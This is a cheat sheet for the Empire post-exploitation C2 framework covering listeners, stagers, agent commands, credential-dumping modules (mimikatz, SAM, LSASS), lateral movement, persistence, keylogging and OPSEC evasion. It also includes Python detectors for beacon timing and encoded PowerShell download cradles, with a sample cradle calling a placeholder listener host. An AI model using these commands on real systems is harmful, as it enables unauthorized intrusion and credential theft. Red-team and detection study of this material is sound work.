
Empire Framework Cheat Sheet

Overview

Empire is a post-exploitation framework that includes a pure-PowerShell 2.0 Windows agent and a pure Python 3 Linux/macOS agent. It provides a powerful command and control (C2) infrastructure for red team operations, penetration testing, and adversary emulation.

⚠️ Warning: Empire is a security testing tool that should only be used in environments where you have explicit permission to do so.

Installation

From GitHub

```bash
# Clone the repository
git clone https://github.com/BC-SECURITY/Empire.git

# Navigate to the directory
cd Empire

# Run the installation script
sudo ./setup/install.sh
```

Using Docker

```bash
# Pull the Docker image
docker pull bcsecurity/empire:latest

# Run the container
docker run -it -p 1337:1337 -p 5000:5000 bcsecurity/empire:latest
```

On Kali Linux

```bash
# Install from the package manager
sudo apt update
sudo apt install powershell-empire
```

Basic Usage

Starting Empire

```bash
# Start the Empire server
sudo empire

# Start with the REST API enabled (required for Starkiller)
sudo empire --rest --username <username> --password <password>
```

Using Starkiller (GUI)

```bash
# Install Starkiller
npm install -g @starkiller/starkiller

# Run Starkiller
starkiller
```

Empire CLI Navigation

| Command | Description |
|---|---|
| help | Display the help menu |
| menu | Return to the main menu |
| back | Go back one menu level |
| exit | Exit Empire |
| usemodule <module> | Select a module to use |
| usestager <stager> | Select a stager to use |
| uselistener <listener> | Select a listener to use |
| interact <agent> | Interact with an agent |
| searchmodule <term> | Search for modules |

Listeners

Creating a Listener

```
# In the Empire CLI
listeners
uselistener http
set Name http_listener
set Host 192.168.1.100
set Port 8080
execute
```

Common Listener Options

| Option | Description |
|---|---|
| Name | Name for the listener |
| Host | IP address or hostname used for staging |
| Port | Port the listener binds to |
| CertPath | Certificate path for HTTPS |
| DefaultDelay | Agent callback delay (in seconds) |
| DefaultJitter | Jitter applied to agent callbacks (0.0-1.0) |
| DefaultProfile | Default communication profile |
| KillDate | Date on which the agent exits (MM/DD/YYYY) |
| WorkingHours | Hours during which the agent calls back (e.g. 09:00-17:00) |
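DefaultDelay and DefaultJitter together set the agent's callback cadence: with jitter j (0.0-1.0) the gap between callbacks spreads over roughly delay*(1-j) to delay*(1+j) seconds, and the same two numbers are what the `sleep` command under OPSEC Considerations changes later. That near-regular cadence is what a defender hunts for in web-server or proxy logs. The following Python is an added example, not part of this cheat sheet and not Empire's own code: it parses constructed Apache-style access log lines, computes the inter-arrival time per client, and flags clients whose intervals all fit a given delay/jitter window or whose intervals vary too little for human browsing. The log lines, IP addresses and paths are constructed samples, and the symmetric jitter window is an assumption about how the agent applies jitter.

```python
import re
import statistics
from datetime import datetime

# Constructed Apache combined-format access log lines (not real traffic).
# 10.0.0.7 calls back every ~5 s with jitter; 10.0.0.9 browses irregularly.
SAMPLE_LOG = """\
10.0.0.7 - - [10/Mar/2024:09:00:00 +0000] "GET /news.php HTTP/1.1" 200 512
10.0.0.9 - - [10/Mar/2024:09:00:00 +0000] "GET /index.html HTTP/1.1" 200 8192
10.0.0.9 - - [10/Mar/2024:09:00:03 +0000] "GET /style.css HTTP/1.1" 200 2048
10.0.0.7 - - [10/Mar/2024:09:00:05 +0000] "GET /news.php HTTP/1.1" 200 512
10.0.0.7 - - [10/Mar/2024:09:00:09 +0000] "GET /news.php HTTP/1.1" 200 512
10.0.0.7 - - [10/Mar/2024:09:00:15 +0000] "GET /news.php HTTP/1.1" 200 512
10.0.0.7 - - [10/Mar/2024:09:00:20 +0000] "GET /news.php HTTP/1.1" 200 512
10.0.0.7 - - [10/Mar/2024:09:00:26 +0000] "GET /news.php HTTP/1.1" 200 512
10.0.0.7 - - [10/Mar/2024:09:00:30 +0000] "GET /news.php HTTP/1.1" 200 512
10.0.0.9 - - [10/Mar/2024:09:00:47 +0000] "GET /about.html HTTP/1.1" 200 4096
10.0.0.9 - - [10/Mar/2024:09:02:10 +0000] "GET /contact.html HTTP/1.1" 200 3072
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def jitter_window(delay, jitter):
    """Seconds between callbacks for a DefaultDelay/DefaultJitter pair.

    Assumption: jitter is applied symmetrically as a fraction of the delay,
    giving delay*(1-jitter) .. delay*(1+jitter).
    """
    return delay * (1 - jitter), delay * (1 + jitter)


def intervals_by_client(log_text):
    """Parse log lines and return {client_ip: [seconds between consecutive requests]}."""
    times = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip malformed lines rather than abort the whole scan
        ts = datetime.strptime(m.group("ts"), TS_FMT)
        times.setdefault(m.group("ip"), []).append(ts)
    intervals = {}
    for ip, stamps in times.items():
        stamps.sort()
        intervals[ip] = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
    return intervals


def fits_window(intervals, delay, jitter, min_samples=5, max_outliers=0):
    """True when at least min_samples intervals exist and all but max_outliers fall in the window."""
    if len(intervals) < min_samples:
        return False
    lo, hi = jitter_window(delay, jitter)
    outliers = sum(1 for d in intervals if not lo <= d <= hi)
    return outliers <= max_outliers


def regularity(intervals):
    """Coefficient of variation (stdev/mean) of the intervals; near 0 means metronomic.

    Returns None when there are too few intervals to judge.
    """
    if len(intervals) < 2:
        return None
    mean = statistics.fmean(intervals)
    if mean == 0:
        return None
    return statistics.pstdev(intervals) / mean


def suspicious_clients(log_text, delay, jitter, max_cv=0.25, min_samples=5):
    """Clients whose cadence matches the given delay/jitter, or is simply too regular."""
    flagged = []
    for ip, ivals in intervals_by_client(log_text).items():
        cv = regularity(ivals)
        too_regular = cv is not None and len(ivals) >= min_samples and cv <= max_cv
        if fits_window(ivals, delay, jitter, min_samples) or too_regular:
            flagged.append(ip)
    return sorted(flagged)


if __name__ == "__main__":
    for ip, ivals in intervals_by_client(SAMPLE_LOG).items():
        print(ip, ivals, "cv=%.2f" % regularity(ivals))
    print("flagged:", suspicious_clients(SAMPLE_LOG, delay=5, jitter=0.2))
```

The window check catches an agent whose delay and jitter you already know from a recovered stager; the coefficient-of-variation check is the generic version and still fires when the operator picks a delay you did not anticipate, at the cost of more tuning against automated but legitimate clients such as monitoring probes.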

Listener Management

```
# List all listeners
listeners

# Kill a listener
kill http_listener

# View a listener's options
info http_listener
```

Stagers

Generating a Stager

```
# In the Empire CLI
usestager windows/launcher_bat
set Listener http_listener
generate
```

Common Stager Types

| Stager | Description |
|---|---|
| windows/launcher_bat | BAT file launcher |
| windows/launcher_vbs | VBS script launcher |
| windows/launcher_powershell | PowerShell launcher |
| multi/launcher | Multi-platform launcher |
| osx/launcher | macOS launcher |
| linux/launcher | Linux launcher |
| windows/dll | DLL launcher |
| windows/macro | Office macro launcher |
| windows/hta | HTA launcher |

Agents

Agent Commands

```
# List all agents
agents

# Interact with an agent
interact C2AGENT123

# Get agent info
info

# Execute a shell command
shell whoami

# Run a PowerShell command
powershell Get-Process

# Upload a file
upload /path/to/local/file /path/on/target

# Download a file
download /path/on/target /local/path

# Take a screenshot
screenshot

# Exit the agent menu
back
```

Agent Management

```
# Rename an agent
rename C2AGENT123 new_name

# Kill an agent
kill C2AGENT123

# Remove an agent from the database
remove C2AGENT123

# Set the sleep interval (seconds)
sleep 30

# Get system information for the agent's host
sysinfo
```

Modules

Using Modules

```
# List available modules
usemodule

# Search for modules
searchmodule credentials

# Use a specific module
usemodule powershell/situational_awareness/network/powerview/get_user

# Set module options
set Username administrator

# Execute the module
execute
```

Common Module Categories

Credential Access

```
# Dump credentials from memory
usemodule powershell/credentials/mimikatz/logonpasswords

# Dump the SAM database
usemodule powershell/credentials/sam

# Dump the LSASS process
usemodule powershell/credentials/credential_injection/lsass_dump
```

Situational Awareness

```
# Get domain users
usemodule powershell/situational_awareness/network/powerview/get_user

# Get domain computers
usemodule powershell/situational_awareness/network/powerview/get_computer

# Get domain groups
usemodule powershell/situational_awareness/network/powerview/get_group
```

Lateral Movement

```
# WMI lateral movement
usemodule powershell/lateral_movement/invoke_wmi

# PsExec lateral movement
usemodule powershell/lateral_movement/invoke_psexec

# WinRM lateral movement
usemodule powershell/lateral_movement/invoke_winrm
```

Persistence

```
# Registry persistence
usemodule powershell/persistence/userland/registry

# Scheduled task persistence
usemodule powershell/persistence/userland/schtasks

# WMI persistence
usemodule powershell/persistence/elevated/wmi
```

Advanced Features

Malleable C2 Profiles

```
# In the Empire CLI
profiles
use default
set DefaultProfile /path/to/profile.profile
```

OPSEC Considerations

```
# Set the agent kill date
set KillDate 01/01/2025

# Set working hours
set WorkingHours 09:00-17:00

# Increase the agent sleep time
sleep 300 30
```

Data Exfiltration

```
# Use the keylogging module
usemodule powershell/collection/keylogger

# Use clipboard monitoring
usemodule powershell/collection/clipboard_monitor

# Use the screenshot module
usemodule powershell/collection/screenshot
```

Troubleshooting

Common Issues

1. Connection Problems

   ```
   # Check that the listener is running (Empire CLI)
   listeners

   # Verify firewall settings (shell on the Empire host)
   sudo iptables -L

   # Check for port conflicts (shell on the Empire host)
   netstat -tuln | grep <port>
   ```

2. Agent Not Checking In

   ```
   # Verify that the agent is listed (Empire CLI)
   agents

   # Check for network connectivity issues between the target and the listener
   # Verify the sleep/jitter settings and working hours: a long sleep delays the next callback
   ```

3. Module Execution Failures

   ```
   # Check the module requirements (Empire CLI, inside the module)
   info

   # Verify the agent's privileges
   shell whoami

   # Try running in a different process context
   usemodule powershell/management/psinject
   ```

Defensive Measures

Detection Methods

  • PowerShell Script Block Logging
  • PowerShell Module Logging
  • AMSI (Antimalware Scan Interface)
  • Network traffic analysis
  • Behavioral analysis
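Script Block Logging (Event ID 4104) records the de-obfuscated script PowerShell actually ran, and process-creation auditing (Event ID 4688) records the command line that launched it, so a launcher of the kind the Stagers section generates leaves the same handful of traits in both: -NoProfile, a hidden window, an -EncodedCommand payload, a web-client download, Invoke-Expression. The Python below is an added example, not part of this cheat sheet and not Empire's own code: it decodes an -EncodedCommand argument back to its UTF-16LE script and scores constructed sample events against those indicators. The sample events, the placeholder hostname listener.invalid and the threshold are constructed assumptions; in production the events would come from Get-WinEvent or a SIEM rather than an inline list.

```python
import base64
import re

# Indicator patterns, case-insensitive, for the PowerShell launcher one-liner shape.
INDICATORS = {
    "noprofile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I),
    "encoded_command": re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    "download_cradle": re.compile(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest", re.I),
    "invoke_expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "base64_decode": re.compile(r"frombase64string", re.I),
}
ENCODED_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def encode_powershell(script):
    """UTF-16LE + base64, the form powershell.exe -EncodedCommand accepts (used here only to build the sample)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(text):
    """Return the script behind -enc/-EncodedCommand, or None if absent or not valid base64/UTF-16LE."""
    m = ENCODED_ARG.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def indicator_hits(text):
    """Sorted names of indicators present in the text and, when present, in its decoded -enc payload."""
    hits = {name for name, rx in INDICATORS.items() if rx.search(text)}
    decoded = decode_encoded_command(text)
    if decoded is not None:
        hits |= {name for name, rx in INDICATORS.items() if rx.search(decoded)}
    return sorted(hits)


def triage(events, threshold=3):
    """(event_id, hits) for every event with at least `threshold` distinct indicators."""
    out = []
    for ev in events:
        hits = indicator_hits(ev["text"])
        if len(hits) >= threshold:
            out.append((ev["id"], hits))
    return out


# Constructed sample records: a benign 4104 script block, a 4688 process command line,
# and a second 4104 block. listener.invalid is a placeholder, not a real host.
_SAMPLE_ONE_LINER = "$c = New-Object Net.WebClient; IEX $c.DownloadString('http://listener.invalid/launcher')"
SAMPLE_EVENTS = [
    {"id": 4104, "text": "Get-Process | Where-Object { $_.CPU -gt 100 } | Sort-Object CPU"},
    {"id": 4688, "text": "powershell.exe -NoP -NonI -W Hidden -Enc " + encode_powershell(_SAMPLE_ONE_LINER)},
    {"id": 4104, "text": "IEX ([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($s)))"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["id"], indicator_hits(ev["text"]))
    print("flagged:", triage(SAMPLE_EVENTS))
```

Counting distinct indicators rather than matching any single one keeps `Invoke-WebRequest` in an admin's update script from paging anyone, while the decode step means an operator gains nothing from hiding the cradle behind -EncodedCommand: the decoded payload is scored with the same patterns.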

Prevention Techniques

```powershell
# Enable PowerShell Script Block Logging (Event ID 4104); create the policy key if it is missing.
# The same keys without Wow6432Node apply to 64-bit PowerShell.
$sbl = "HKLM:\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging"
New-Item -Path $sbl -Force | Out-Null
Set-ItemProperty -Path $sbl -Name "EnableScriptBlockLogging" -Value 1 -Type DWord

# Enable PowerShell Module Logging (Event ID 4103); ModuleNames "*" selects every module
$ml = "HKLM:\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ModuleLogging"
New-Item -Path "$ml\ModuleNames" -Force | Out-Null
Set-ItemProperty -Path $ml -Name "EnableModuleLogging" -Value 1 -Type DWord
Set-ItemProperty -Path "$ml\ModuleNames" -Name "*" -Value "*"

# Constrained Language Mode set this way applies to the current session only;
# enforce it system-wide with an AppLocker or WDAC policy instead
$ExecutionContext.SessionState.LanguageMode = "ConstrainedLanguage"
```

Resources


This cheat sheet provides a comprehensive reference for using Empire in security testing scenarios. Always ensure you have proper authorization before using this tool in any environment.